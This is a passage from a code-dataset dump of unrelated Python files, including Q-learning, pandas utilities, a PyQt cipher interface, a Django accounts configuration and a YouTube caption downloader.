lr=learning_rate)\r\n\r\n # Print out Success rate and Q-Table\r\n print(\"Success rate: \", str(sum(rList)/num_episodes))\r\n print(\"Final Q-Table Values\")\r\n print(Q)\r\n\r\n # Outcome of the discounted factor is shown well\r\n plt.bar(range(len(rList)), rList, color=\"blue\")\r\n plt.show()\r\n","sub_path":"week3/rl_lab5_hkko.py","file_name":"rl_lab5_hkko.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"532685389","text":"\"\"\"Ejercicio2:\nDiseña un programa que solicite la lectura de un número entre 0 y 10 (ambos inclusive).\nSi el usuario teclea un número fuera del rango válido, el programa solicitará nuevamente \nla introducción del valor cuantas veces sea menester.\"\"\"\n\nnro = int(input(\" ingrese un número entre 0 y 10 : \"))\n\nwhile nro < 0 or nro >10:\n print (\" El número ingresado no se encuentra dentro del rango \")\n nro=int(input(\"Ingrese un número entre 0 y 10: \"))\n\nif nro in range (1,10):\n print(\"felicitaciones, cumpliste la consigna!!\")","sub_path":"eje2guia2.py","file_name":"eje2guia2.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"329770199","text":"\"\"\"\nSummary class to provide a quick access to statistical summary\nin a way useful to create box-plot.\n\n\"\"\"\n\nimport numpy\nimport pandas\n\n\nclass Summary:\n\n def __init__(self, df, key, val, k=1.5):\n \"\"\"\n :param df: a pandas data frame\n :param key: a column name (categorical)\n :param val: a column name (numerical)\n :param k: multiplier (to detect outliers), default to 1.5\n \"\"\"\n self.df = df\n self.key = key\n self.xval = val\n self._k = k\n\n self.summary_table = self._summarize()\n self.outliers = self.outliers()\n\n def __str__(self):\n MSG = \"Summary of {} by {}:\\n{}\\n{}\\n{}\"\n return MSG.format(self.xval, self.key, \"-\" * 100, self.summary_table, \"-\" * 100)\n\n def _summarize(self):\n \"\"\"Wraps summarize_x method\n :param df: pandas data frame\n\n Return a summary table for each level of key column\n \"\"\"\n groups = self.df[[self.key, self.xval]].groupby(self.key)\n dx = [Summary.summarize_x(x=dfx[self.xval],\n category_value=name,\n k=self._k)\n for name, dfx in groups]\n dx = pandas.concat(dx)\n dx.rename(columns={\"category\": self.key}, inplace=True)\n return dx\n\n def outliers(self):\n \"\"\"Retrurns outliers, if any.\"\"\"\n # if not self.summary:\n # self.summary = self.summarize()\n\n dx = pandas.merge(self.df[[self.key, self.xval]],\n self.summary_table[[self.key, 'upper', 'lower']],\n how=\"left\", on=self.key)\n outlier_ids = (dx[self.xval] > dx['upper']) | ((dx[self.xval] < dx['lower']))\n return dx[outlier_ids]\n\n @staticmethod\n def summarize_x(x, category_value=\"default\", k=1.5):\n \"\"\"Calculates base and extended summary\n\n base summary:\n min, q1, median, q3, max\n\n extended summary:\n iqr - Interquartile range\n upper - Upper bound for inliers\n lower - Lower bound for inliers\n stem_upper - Upper Steam(for box plot)\n steam_lower - Lower Steam value(for box plot)\n \"\"\"\n\n # base summary\n dx = pandas.DataFrame({\n \"category\": category_value,\n \"min\": [numpy.min(x)],\n \"q1\": [numpy.percentile(x, 25)],\n \"median\": [numpy.percentile(x, 50)],\n \"q3\": [numpy.percentile(x, 75)],\n \"max\": [numpy.max(x)]\n })\n\n dx['iqr'] = dx['q3'] - dx['q1']\n dx['upper'] = dx['q3'] + k * dx['iqr']\n dx['lower'] = dx['q1'] - k * dx['iqr']\n dx['stem_upper'] = dx[['upper', 'max']].apply(min, axis=1)\n dx['stem_lower'] = dx[['lower', 'min']].apply(max, axis=1)\n return dx\n","sub_path":"bokeh_templates/utils/summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"290124237","text":"import os\nassert os.environ['CONDA_DEFAULT_ENV']=='skbio_env', 'You should use the conda environment skbio_env'\nimport numpy as np\nfrom skbio.stats.ordination import cca\nimport pandas as pd\nimport matplotlib.pylab as plt\nfrom copy import copy\nimport matplotlib.colors as mcolors\nimport seaborn as sns\nfrom matplotlib.patches import Patch\n\nredFspecies = True\n\nspl = [6,11,25,250]\ntits = ['(a)', '(b)', '(c)', '(d)']\nAllvars = False\nnoise = [True,False]\nplott=True#False#\ndirRead = '/Users/nooteboom/Documents/GitHub/cluster_TM/cluster_SP/density/dens/ordination/'\n\nminss = [100,200, 300, 400, 500, 600, 700, 800, 900,1000] # The s_min values\nxiss = np.arange(0.0001,0.01, 0.0001) # The xi values\n\nfig, ax = plt.subplots(2,3, figsize=(16,16),\n gridspec_kw={'width_ratios':[1,1,0.08]})\nax[0,0].get_shared_y_axes().join(ax[1,0])\nax[0,1].get_shared_y_axes().join(ax[1,1])\nfor axs in ax[:, 2]:\n axs.remove()\ngs = ax[1, 2].get_gridspec()\naxbig = fig.add_subplot(gs[:, 2])\nsns.set(style='whitegrid',context='paper', font_scale=2)\nfs=20\nvs = np.array([-1,1])*0.8\n\nfor spi, sp in enumerate(spl):\n print(sp)\n # keep track of the results\n # F and D stand for Foram and Dino\n # noise keeps track of CCA results if noisy locations are included\n # cluster keeps track of results if noisy locations are excluded\n FNoise = np.zeros((len(minss), len(xiss)))\n DNoise = np.zeros((len(minss), len(xiss)))\n FCluster = np.zeros((len(minss), len(xiss)))\n DCluster = np.zeros((len(minss), len(xiss)))\n \n for mini,mins in enumerate(minss):\n print('min: %d'%(mins))\n for xii, xis in enumerate(xiss):\n opts = [\"xi\", xis]\n \n if(redFspecies):\n ff = np.load('loops/redF/prepredF_CCA_sp%d_smin%d%s_%.5f.npz'%(sp, mins, opts[0], opts[1])) \n else:\n ff = np.load(dirRead+'loops/prep_CCA_sp%d_smin%d%s_%.5f.npz'%(sp, mins, opts[0], opts[1]))\n #%%\n envs = ff['envnames']\n if(Allvars): \n envsplt = ff['envnames'] \n else: \n envsplt = ff['envnames'] \n envsplt = ['temp','N']\n Flabels = ff['Flabels']\n Flabelsfull = copy(Flabels)\n Fenv = ff['Fenv']\n for ni,n in enumerate(noise):\n envs = ff['envnames']\n envsplt = ['temp','N']\n Flabels = ff['Flabels']\n Fenv = ff['Fenv']\n Fenv_nn = ff['Fenv_nn']\n \n #%% Foraminifera\n data = ff['data']\n sites = np.array(['site %d'%(i) for i in range(data.shape[0])])\n species = np.array(['species %d'%(i) for i in range(data.shape[1])])\n \n if(not n):\n args = np.where(Flabels!=-1)\n data = data[args]\n Flabels = Flabels[args]\n sites = sites[args]\n Fenv = Fenv[args]\n Fenv_nn = Fenv_nn[args]\n \n X = pd.DataFrame(data, sites, species)\n Y = pd.DataFrame(Fenv, sites, envs)\n Y_nn = pd.DataFrame(Fenv_nn, sites, envs)\n \n # del Y['N']\n del Y['Si']\n # del Y['P']\n #del Y['temp']\n # del Y['salt']\n \n if(len(Y.values)!=0):\n if(Y.shape[0]>1):\n CCA = cca(Y,X)\n else:\n FCluster[mini,xii] = np.nan\n \n if(n):\n FNoise[mini,xii] = np.sum(CCA.proportion_explained[:len(CCA.proportion_explained)//2])\n else:\n FCluster[mini,xii] = np.sum(CCA.proportion_explained[:len(CCA.proportion_explained)//2])\n else:\n FCluster[mini,xii] = np.nan\n #%% Load the significant according to the subsamples\n its = 999\n siglevel = 0.05\n if(redFspecies):\n ffsig = np.load('randomsubsamples_redF_sp%d_its%d.npz'%(sp,its))\n else:\n ffsig = np.load('randomsubsamples_sp%d_its%d.npz'%(sp,its))\n percF = ffsig['Fperc']\n assert percF.shape==FNoise.shape\n \n color1 = plt.cm.copper(np.linspace(0, 1, int(100*(1-siglevel))))\n color2 = plt.cm.Blues(np.linspace(0.8, 1, int(100*siglevel)))\n # combine them and build a new colormap\n cmapp = mcolors.LinearSegmentedColormap.from_list('my_colormap', np.vstack((color2, color1)))\n fs=20\n \n # Set the x ticks:\n num_ticks = len(xiss)\n frac = 6\n xticks = np.linspace(0, (len(xiss) - 1), num_ticks, dtype=np.int)\n xticklabels = []\n for i, idx in enumerate(xticks):\n if(i%frac==0):\n xticklabels.append(np.round(xiss[idx] / 1e-3,5))\n else:\n xticklabels.append('') \n \n FN = (FCluster-FNoise)\n FN[FN==0] = np.nan\n FN = pd.DataFrame(data=FN, index=minss, columns=xiss)\n \n if(False): # if a two-sided test is used\n sigF = np.full(percF.shape, '')\n for i in range(percF.shape[0]):\n for j in range(percF.shape[1]):\n if(np.array(FN)[i,j]>=0):\n if(percF[i,j]>siglevel/2):\n sigF[i,j] = 'l'\n elif(np.array(FN)[i,j]<0):\n if((1-percF[i,j])>siglevel/2):\n sigF[i,j] = 'l'\n else: # otherwise a one-sided test is used\n sigF = (percF<=siglevel).astype(str)\n sigF[sigF=='False'] = 'l'\n sigF[sigF=='True'] = ''\n \n #%\n \n # Create the colormap\n colors2 = plt.cm.RdGy(np.linspace(0, 1, 128))[::-1]\n # combine them and build a new colormap\n cmap1 = mcolors.LinearSegmentedColormap.from_list('my_colormap', colors2)\n cmap1.set_bad(\"tab:blue\") # set the color for nan values\n cmap1.set_under(\"tab:blue\") # set the color for insignificant values\n \n # Set the x ticks:\n num_ticks = len(xiss)\n frac = 6\n xticks = np.linspace(0, (len(xiss) - 1), num_ticks, dtype=np.int)\n xticklabels = []\n for i, idx in enumerate(xticks):\n if(i%frac==0):\n xticklabels.append(np.round(xiss[idx] / 1e-3,5))\n else:\n xticklabels.append('')\n \n \n DN = (DCluster-DNoise)\n FN = (FCluster-FNoise)\n FN[FN==0] = np.nan\n DN[DN==0] = np.nan\n \n DN = pd.DataFrame(data=DN, index=minss, columns=xiss)\n FN = pd.DataFrame(data=FN, index=minss, columns=xiss)\n \n # The figure\n \n if(spi==0):\n g1 = sns.heatmap(FN,cmap=cmap1,ax=ax[spi//2, spi%2], vmin=vs[0], vmax=vs[1], \n xticklabels=xticklabels, annot=sigF, fmt='', cbar_ax=axbig)\n else:\n g1 = sns.heatmap(FN,cmap=cmap1,ax=ax[spi//2, spi%2], vmin=vs[0], vmax=vs[1], \n xticklabels=xticklabels, annot=sigF, fmt='', cbar=False)\n ax[spi//2, spi%2].set_yticklabels(minss,fontsize=fs-6, rotation='horizontal')\n if(spi%2==0):\n g1.set_ylabel('$s_{min}$', fontsize=fs)\n else:\n g1.set_yticklabels([])\n if(spi//2==1):\n ax[spi//2, spi%2].set_xticklabels(xticklabels, fontsize=fs-6, rotation='vertical')\n ax[spi//2, spi%2].set_xticks(xticks+0.5)\n g1.set_xlabel('$\\\\xi\\cdot10^{-3}$', fontsize=fs)\n else:\n g1.set_xticklabels([])\n g1.set_xticks([])\n g1.set_title(tits[spi], fontsize=fs)\n\nlegend_elements = [Patch(facecolor=cmap1(np.nan),\n label='-no cluster\\n', linewidth=0)]\nleg = axbig.legend(handles=legend_elements, loc='upper left',\n bbox_to_anchor=(-0.525, -0.1005, 0.1, 0.1), frameon=False,\n handletextpad=-0.25)\n\nfor patch in leg.get_patches():\n patch.set_height(41)\n patch.set_width(30)\n \n # g2 = sns.heatmap(FN,cmap=cmap1,cbar=True,ax=ax[1], vmin=-0.35, vmax=0.35, \n # cbar_ax=ax[0,2], yticklabels=False, annot=sigF, fmt='')\n # ax[1].set_xticks(xticks+0.5)\n # ax[1].set_xticklabels(xticklabels, fontsize=fs-6, rotation='vertical')\n \nplt.savefig('heatmap_SI_CCA.png', dpi=300,bbox_inches='tight')\nplt.subplots_adjust(hspace=0.07)\nplt.show()","sub_path":"OPTICS/ordination/figure6_SI.py","file_name":"figure6_SI.py","file_ext":"py","file_size_in_byte":8210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"394065130","text":"import sys\r\nfrom PyQt5.QtWidgets import QApplication,QDialog,QMainWindow,QPushButton,QLabel\r\nfrom PyQt5 import uic\r\nfrom alfabeto.Alfabeto import Alfabeto\r\nfrom texto.textoPlano import TextoPlano\r\nfrom procesar.Cifrador import Cifrador\r\nfrom texto.textoCifrado import TextoCifrado\r\nfrom procesar.DesCifrador import Descifrador\r\n\r\n\r\n\r\nclass Ventana(QMainWindow):\r\n alfabeto = Alfabeto()\r\n cifrador = Cifrador(alfabeto)\r\n descifrador = Descifrador(alfabeto)\r\n\r\n def __init__(self):\r\n QMainWindow.__init__(self)\r\n uic.loadUi(\"Interfaz.ui\",self)\r\n self.texto = self.e_Texto\r\n self.espacios = self.e_Espacios\r\n self.cifrar = self.radioCifrar\r\n self.descifrar = self.radioDescifrar\r\n self.result = self.resultado\r\n self.texto.cursorPositionChanged.connect(self.procesar)\r\n\r\n#self.result.toPlainText()\r\n\r\n def procesar(self):\r\n if self.cifrar.isChecked():\r\n textoPlano = self.texto.text()\r\n self.result.clear()\r\n num = self.espacios.text()\r\n if(num.isdigit()):\r\n espacios = int(num)\r\n textoCifrado = self.cifrador.cifrarTexto(espacios,textoPlano)\r\n self.result.appendPlainText(textoCifrado)\r\n else:\r\n self.result.appendPlainText(\"Ingrese el numero de celulas\")\r\n elif self.descifrar.isChecked():\r\n textoCifrado = self.texto.text()\r\n self.result.clear()\r\n num = self.espacios.text()\r\n if (num.isdigit()):\r\n espacios = int(num)\r\n plainText = self.descifrador.descifrarTexto(espacios, textoCifrado)\r\n self.result.appendPlainText(plainText)\r\n else:\r\n self.result.appendPlainText(\"Ingrese el numero de celulas\")\r\n\r\n\r\n\r\n\r\n","sub_path":"juego/codigo/Interfaz.py","file_name":"Interfaz.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"73816498","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf import settings\n\neditor_models = [\n 'articleauthor',\n 'article',\n 'content',\n 'contentgallery',\n 'contentproperty',\n 'contentpropertyclass',\n 'contentpropertyvalue',\n 'event',\n 'eventplace',\n 'externalcontent',\n 'feed',\n 'image',\n 'news',\n 'place',\n 'revision',\n 'route',\n 'routeitem',\n 'seo',\n 'session',\n 'showcase',\n 'showcaseitem',\n 'source',\n 'tag',\n 'version',\n 'subscriber',\n 'rubric',\n]\n\nmarket_models = [\n 'checklistselectitem',\n 'checklist',\n 'checklistcategory',\n 'checklistitem',\n 'checklistcategory_checklist',\n 'checklistitem_checklistcategory',\n 'usercheckliststore',\n 'look',\n 'lookarea',\n 'marketcategory',\n 'product',\n 'offer',\n 'seo',\n 'image',\n 'revision',\n]\n\nGROUPS = {\n 'redactor': {'name': u'Редакторы', 'permissions': editor_models},\n 'account': {\n 'name': u'Аккаунт-менеджеры',\n 'permissions': ['user', 'group']\n },\n 'market': {'name': u'Маркет', 'permissions': market_models},\n}\n\n\n# Examples for ACCOUNTS.\n# Create account for redactor by default:\n# {'username': 'username'}\n#\n# Create account with custom options for all envs:\n# {\n# 'username': 'username',\n# 'envs': {\n# 'all': {\n# 'is_superuser': True,\n# },\n# ...\n# }\n# }\n#\n# Create account with custom options depends by envs:\n# {\n# 'username': 'username',\n# 'envs': {\n# settings.ENVIRONS['master']: {\n# 'groups': [\n# GROUPS['redactor']['name']\n# ], # [u'Редакторы'] by default\n# 'is_staff': True, # True by default\n# 'is_superuser': False, # False by default\n# },\n# ...\n# }\n# }\n\nACCOUNTS = [\n {\n 'username': 'd.egorov',\n 'envs': {'all': {'is_superuser': True}},\n },\n {\n 'username': 'v.zakharov',\n 'envs': {'all': {'is_superuser': True}},\n },\n {\n 'username': 'm.konstantinov',\n 'envs': {'all': {'is_superuser': True}},\n },\n {\n 'username': 'e.oblozhikhina',\n 'envs': {'all': {'is_superuser': True}},\n },\n {\n 'username': 'a.bogoyavlensky',\n 'envs': {'all': {'is_superuser': True}},\n },\n {\n 'username': 't.mestnikova',\n 'envs': {'all': {'is_superuser': True}},\n },\n {\n 'username': 'dm.kuznetsov',\n 'envs': {'all': {'is_superuser': True}},\n },\n {\n 'username': 'y.sidneva',\n 'envs': {\n 'all': {\n 'groups': [\n GROUPS['redactor']['name'],\n GROUPS['account']['name'],\n ]\n },\n # settings.ENVIRONS['master']: {\n # 'groups': [GROUPS['redactor']['name']],\n # },\n },\n },\n {\n 'username': 'o.katina',\n 'envs': {\n 'all': {\n 'groups': [\n GROUPS['redactor']['name'],\n GROUPS['account']['name'],\n ]\n },\n },\n },\n {\n 'username': 's.beri',\n 'envs': {\n 'all': {\n 'groups': [\n GROUPS['redactor']['name'],\n GROUPS['account']['name'],\n ]\n },\n },\n },\n {'username': 'a.shishkin'},\n {'username': 'y.lakhmetkina'},\n {'username': 'a.chechulina'},\n {'username': 'a.pozhidaeva'},\n {'username': 'Nadezhda.Kolosova'},\n {'username': 'a.panasenko'},\n {'username': 'n.bykadorova'},\n {'username': 'o.batylina'},\n {'username': 'd.evseeva'},\n {'username': 'a.karsakova'},\n {\n 'username': 'nkolosova',\n 'envs': {'all': {'groups': []}},\n },\n {\n 'username': 'r.yunichenko',\n 'envs': {'all': {'groups': [], 'is_staff': False}},\n },\n {\n 'username': 'a.kruglov',\n 'envs': {'all': {'groups': [], 'is_staff': False}},\n },\n]\n","sub_path":"src/admin_app/core/utils/accounts.py","file_name":"accounts.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"653778616","text":"import urllib.request, urllib.parse, urllib.error\r\nimport html.parser\r\nfrom re import search, DOTALL\r\nimport codecs\r\n\r\n\r\nclass getyoutubecc():\r\n \"\"\" This class allows you to download the caption from a video from you tube\r\n Example:\r\n >>> import getyoutubecc\r\n #import the library\r\n >>> cc = getyoutubecc.getyoutubecc('2XraaWefBd8','en')\r\n # Now in cc.caption_obj are the parsed captions, its syntax is like:\r\n # [{'texlines': [u\"caption first line\", 'caption second line'],\r\n # 'time': {'hours':'1', 'min':'2','sec':44,'msec':232} }]\r\n # Modify the caption as you want if desired\r\n >>> cc.writeSrtFile('captionsfile.srt')\r\n #write the contents to a srt file\r\n Note:\r\n MULTITRACK VIDEO\r\n if video is a multitrack video (or the track has a name) you need\r\n to specify the name of the track:\r\n >>> cc = getyoutubecc.getyoutubecc('pNiFoYt69-w','fr','french')\r\n TRANSLATE VIDEO\r\n if you prefer the automatic translation to another language use\r\n the lang code\r\n >>> cc = getyoutubecc.getyoutubecc('pNiFoYt69-w','fr','french', tlang:'es')\r\n \"\"\"\r\n\r\n caption_obj = {}\r\n\r\n \"\"\" This object contains the fetched captions. Use this to treat the captions or whatever\"\"\"\r\n def __init__(self, video_id, lang=\"en\", track=\"\", tlang=\"\" ):\r\n \"\"\" \"\"\"\r\n #Obtain the file from internet\r\n cc_url = \"http://www.youtube.com/api/timedtext?v=\" + video_id + \"&lang=\" + lang + \"&name=\" + track + \"&tlang=\" + tlang\r\n print(\"video id: \" + video_id)\r\n print(\"video language: \" + lang)\r\n print(\"video track: \" + track)\r\n print(\"translate video to: \" + tlang)\r\n try:\r\n cc = urllib.request.urlopen(cc_url).read()\r\n except:\r\n print(\"Problem with connection\")\r\n #parse the file to make a easy to modify object with the captions and its time\r\n if self.caption_obj == []:\r\n print(\"url \" + cc_url + \" was an empty response. Multitrack video?\")\r\n self.caption_obj = self._parseXml(cc);\r\n\r\n def writeSrtFile(self,filename=\"caption\"):\r\n srt_lines = self._generateSrt(self.caption_obj) #generate the srt file\r\n srtfile = open(filename,'wb')\r\n for line in srt_lines:\r\n srtfile.write( line.encode('utf8') + \"\\n\")\r\n\r\n def _parseXml(self,cc):\r\n \"\"\" INPUT: XML file with captions\r\n OUTPUT: parsed object like:\r\n [{'texlines': [u\"So, I'm going to rewrite this\", 'in a more concise form as'],\r\n 'time': {'hours':'1', 'min':'2','sec':44,'msec':232} }]\r\n \"\"\"\r\n htmlpar = html.parser.HTMLParser()\r\n cc = cc.split(\"\") # ['So, it will\\nhas time', 'blah', ..]\r\n captions = []\r\n for line in cc:\r\n if search('text', line):\r\n time = search(r'start=\"(\\d+)(?:\\.(\\d+)){0,1}', line).groups() # ('2997','929')\r\n time = (int(time[0]), int(0 if not time[1] else time[1]) )\r\n #convert seconds and millisec to int\r\n text = search(r'\">(.*)', line, DOTALL).group(1) # extract text i.e. 'So, it will\\nhas time'\r\n textlines = [ htmlpar.unescape(htmlpar.unescape( str(lineunparsed,\"utf-8\") )) for lineunparsed in text.split('\\n') ]\r\n #unscape chars like & or '\r\n ntime = {'hours':time[0]/3600,\"min\":time[0]%3600/60,\"sec\":time[0]%3600%60,\"msec\":time[1]}\r\n captions.append({'time':ntime,'textlines':textlines})\r\n return captions\r\n\r\n def _generateSrt(self,captions):\r\n \"\"\" INPUT: array with captions, i.e.\r\n [{'texlines': [u\"So, I'm going to rewrite this\", 'in a more concise form as'],\r\n 'time': {'hours':'1', 'min':'2','sec':44,'msec':232} }]\r\n OUTPUT: srtformated string\r\n \"\"\"\r\n caption_number = 0\r\n srt_output = []\r\n for caption in captions:\r\n caption_number += 1\r\n #CAPTION NUMBER\r\n srt_output.append(str(caption_number))\r\n #TIME\r\n time_from = ( caption['time']['hours'], caption['time']['min'], caption['time']['sec'], caption['time']['msec'] )\r\n if len(captions)>caption_number:\r\n #display caption until next one\r\n next_caption_time = captions[caption_number]['time']\r\n time_to = ( next_caption_time['hours'], next_caption_time['min'], next_caption_time['sec'], next_caption_time['msec'] )\r\n else:\r\n #display caption for 2 seconds\r\n time_to = (time_from[0],time_from[1]+2,time_from[2],time_from[3])\r\n srt_output.append( (\":\").join([str(i) for i in time_from[0:-1]])+\",\"+str(time_from[-1])+\" --> \"+(\":\").join([str(i) for i in time_to[0:-1]])+\",\"+str(time_to[-1]))\r\n #CAPTIONS\r\n for caption_line in caption['textlines']:\r\n srt_output.append(caption_line)\r\n #Add two empty lines to serarate every caption showed\r\n srt_output.append(\"\")\r\n srt_output.append(\"\")\r\n return srt_output\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n import getopt\r\n sys.argv\r\n\r\n videoid = ''\r\n lang = ''\r\n track = ''\r\n tlang = ''\r\n\r\n try:\r\n opts, args = getopt.getopt(sys.argv[1:],\"hv:l:t:T:\",[\"videoid=\",\"language=\",\"track=\",\"translate=\"])\r\n except getopt.GetoptError:\r\n print('getyoutubecc -v -l -t -T ')\r\n print('Example: getyoutubecc -v pNiFoYt69-w -l fr -t french -T es')\r\n print('Example: getyoutubecc -v 2XraaWefBd8 -l en ')\r\n sys.exit(2)\r\n for opt, arg in opts:\r\n if opt == '-h':\r\n print('getyoutubecc -v -l -t -T ')\r\n print('Example: getyoutubecc -v pNiFoYt69-w -l fr -t french -T es')\r\n print('Example: getyoutubecc -v 2XraaWefBd8 -l en ')\r\n print('NOTE: if video has a track name, the -t argument is mandatory ')\r\n sys.exit()\r\n elif opt in (\"-v\", \"--videoid\"):\r\n videoid = arg\r\n elif opt in (\"-l\", \"--language\"):\r\n lang = arg\r\n elif opt in (\"-t\", \"--track\"):\r\n track = arg\r\n elif opt in (\"-T\", \"--translate\"):\r\n tlang = arg\r\n if videoid != '':\r\n print(\"downloading \" + videoid + \" captions\")\r\n cc = getyoutubecc(videoid, lang, track, tlang)\r\n cc.writeSrtFile(videoid + '.srt')\r\n else:\r\n print('getyoutubecc -v -l -t -T ')\r\n print('Example: getyoutubecc -v pNiFoYt69-w -l fr -t french -T es')\r\n print('Example: getyoutubecc -v 2XraaWefBd8 -l en ')\r\n print('NOTE: if video has a track name, the -t argument is mandatory ')\r\n","sub_path":"videogrep/tools/getyoutubecc.py","file_name":"getyoutubecc.py","file_ext":"py","file_size_in_byte":7026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"268373067","text":"\n#Definition of ListNode\nclass ListNode(object):\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\n#Definition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\nclass Solution:\n \"\"\"\n @param head: The first node of linked list.\n @return: a tree node\n \"\"\"\n curt = None\n def sortedListToBST(self, head):\n # write your code here\n def len_bst(head):\n count = 0\n while head != None:\n count += 1\n head = head.next\n return count\n \n def lst_to_bst_helper(length):\n global curt\n if length <= 0:\n return None\n left = lst_to_bst_helper(length/2)\n root = TreeNode(curt.val)\n root.left = left\n curt = curt.next\n right = lst_to_bst_helper(length - 1 - length/2)\n root.right = right\n return root\n \n if head == None:\n return head\n length = len_bst(head)\n global curt\n curt = head\n return lst_to_bst_helper(length)\n\nif __name__ == \"__main__\":\n head = ListNode(1)\n head.next = ListNode(2)\n head.next.next = ListNode(3)\n sol = Solution()\n bst = sol.sortedListToBST(head)\n","sub_path":"algorithm/official_notes/4/problems_linkList/(106) Convert Sorted List to Binary Search Tree.py","file_name":"(106) Convert Sorted List to Binary Search Tree.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"367523231","text":"# Lint as: python2, python3\n\"\"\"Pandas utilities for //ads/metrics/lib/meterstick.\"\"\"\n\nfrom __future__ import division\n\nimport numpy as np\nimport pandas as pd\n\n\ndef select_by_position(data, idx):\n \"\"\"Gets row(s) of data corresponding to position idx.\n\n Args:\n data: a DataFrame\n idx: a position (integer from 0 to len(data)-1)\n\n Returns:\n A DataFrame containing the rows corresponding to\n position idx.\n \"\"\"\n try:\n # Double brackets force Pandas to return a DataFrame.\n return data.iloc[[idx]]\n except KeyError:\n # Return a correctly shaped DataFrame of NaNs.\n if isinstance(data.index, pd.MultiIndex):\n return np.nan * data.reset_index(level=0, drop=True)\n else:\n return np.nan * data.reset_index(drop=True)\n\n\ndef select_by_label(data, idx):\n \"\"\"Gets row(s) of data corresponding to index label idx.\n\n Args:\n data: a DataFrame\n idx: an index label\n\n Returns:\n A DataFrame containing the rows corresponding to\n index label idx.\n \"\"\"\n if isinstance(data.index, pd.MultiIndex):\n try:\n # Pandas always returns DataFrame for a MultiIndex.\n return data.loc[idx]\n except KeyError:\n # If idx not found, return a data frame of all NaNs\n # with the first level dropped.\n return np.nan * data.reset_index(level=0, drop=True)\n else:\n # Force Pandas to return a DataFrame.\n inds = data.index.isin([idx])\n if inds.any():\n # This was the fastest solution in speed testing.\n return data[inds].reset_index(drop=True)\n else:\n return np.nan * data.reset_index(drop=True)\n\n\ndef concat(objects, axis=0, keys=None, name=None):\n \"\"\"Concatenates Pandas objects.\n\n Works similarly to pd.concat(), except it is able to\n concatenate scalars as well.\n\n Args:\n objects: a list of scalars, Series, or DataFrames\n axis: 0 or 1, indicating which axis to concatenate along\n keys: the label to add for each element that gets concatenated\n name: the name for the Series or DataFrame\n\n Returns:\n A Series or a DataFrame\n\n Raises:\n ValueError: results could not be concatenated\n \"\"\"\n if all(isinstance(obj, (pd.Series, pd.DataFrame)) for obj in objects):\n output = pd.concat(objects, axis=axis, keys=keys, names=[name])\n elif all(np.isscalar(obj) for obj in objects):\n if axis == 0:\n output = pd.Series(objects, index=pd.Index(keys, name=name))\n elif axis == 1:\n output = pd.DataFrame([objects], columns=keys)\n else:\n raise ValueError(\"Could not concatenate objects because the types \"\n \"of the objects did not match.\")\n\n return output\n\n\ndef index_product(index1, index2):\n \"\"\"Produces an index containing the product of the levels of two indexes.\n\n Functions similarly to pd.MultiIndex.from_product(), but is able to\n take products of MultiIndexes.\n\n Args:\n index1: A pandas Index (possibly a MultiIndex)\n index2: A pandas Index (possibly a MultiIndex)\n\n Returns:\n A Pandas MultiIndex whose levels are the product of all levels from\n index1 with all levels from index2.\n\n Raises:\n ValueError: Both indexes are None, or the indexes have non-unique\n levels.\n \"\"\"\n # return index2 if index1 is None\n if index1 is None:\n if index2 is None:\n raise ValueError(\"Both indexes are None.\")\n else:\n return index2\n # return index1 if index2 is None\n elif index2 is None:\n return index1\n\n # check that the values in the indexes are unique\n if not index1.is_unique or not index2.is_unique:\n raise ValueError(\"Can only take the product of two indexes with \"\n \"unique levels.\")\n\n # Get a list of the possible index values.\n # (Each index value is itself a list.)\n index_values = []\n for i in index1:\n for j in index2:\n index_value = []\n if isinstance(index1, pd.MultiIndex):\n index_value.extend(i)\n else:\n index_value.append(i)\n if isinstance(index2, pd.MultiIndex):\n index_value.extend(j)\n else:\n index_value.append(j)\n index_values.append(index_value)\n\n # Get the names for the index levels.\n index_names = index1.names + index2.names\n\n # Construct MultiIndex from the values and the names\n return pd.MultiIndex.from_tuples(index_values, names=index_names)\n\n\ndef index_product_from_vars(data, variables, expand):\n \"\"\"Constructs an index consisting of combinations of levels in vars.\n\n Args:\n data: A Pandas DataFrame.\n variables: A list of strings representing variables of the DataFrame.\n expand: A boolean; if True, expand index to include all possible\n combinations of levels, whether or not they appear in the data or not.\n\n Returns:\n A Pandas Index consisting of all combinations of levels in the variables.\n \"\"\"\n if expand:\n return pd.MultiIndex.from_product(\n [data[var].drop_duplicates() for var in variables],\n names=variables)\n else:\n return (data[variables].drop_duplicates().\n set_index(variables).index)\n\n\ndef any_null(obj):\n \"\"\"Checks if there are any null values in obj.\n\n Args:\n obj: A scalar, Series, or DataFrame.\n\n Returns:\n A boolean. True if there are any NaN values in obj.\n\n Raises:\n ValueError: if obj is not a scalar, Series, or DataFrame\n \"\"\"\n if np.isscalar(obj):\n return pd.isnull(obj)\n elif isinstance(obj, pd.Series):\n return obj.isnull().any()\n elif isinstance(obj, pd.DataFrame):\n return obj.isnull().values.any()\n else:\n raise ValueError(\"obj is not a scalar, Series, or DataFrame.\")\n","sub_path":"pdutils.py","file_name":"pdutils.py","file_ext":"py","file_size_in_byte":5485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"289988766","text":"from QLNES import *\nfrom pickle import dump,load\nimport sys\nfrom sys import argv\nfrom datetime import datetime\nfrom os import mkdir\nfrom 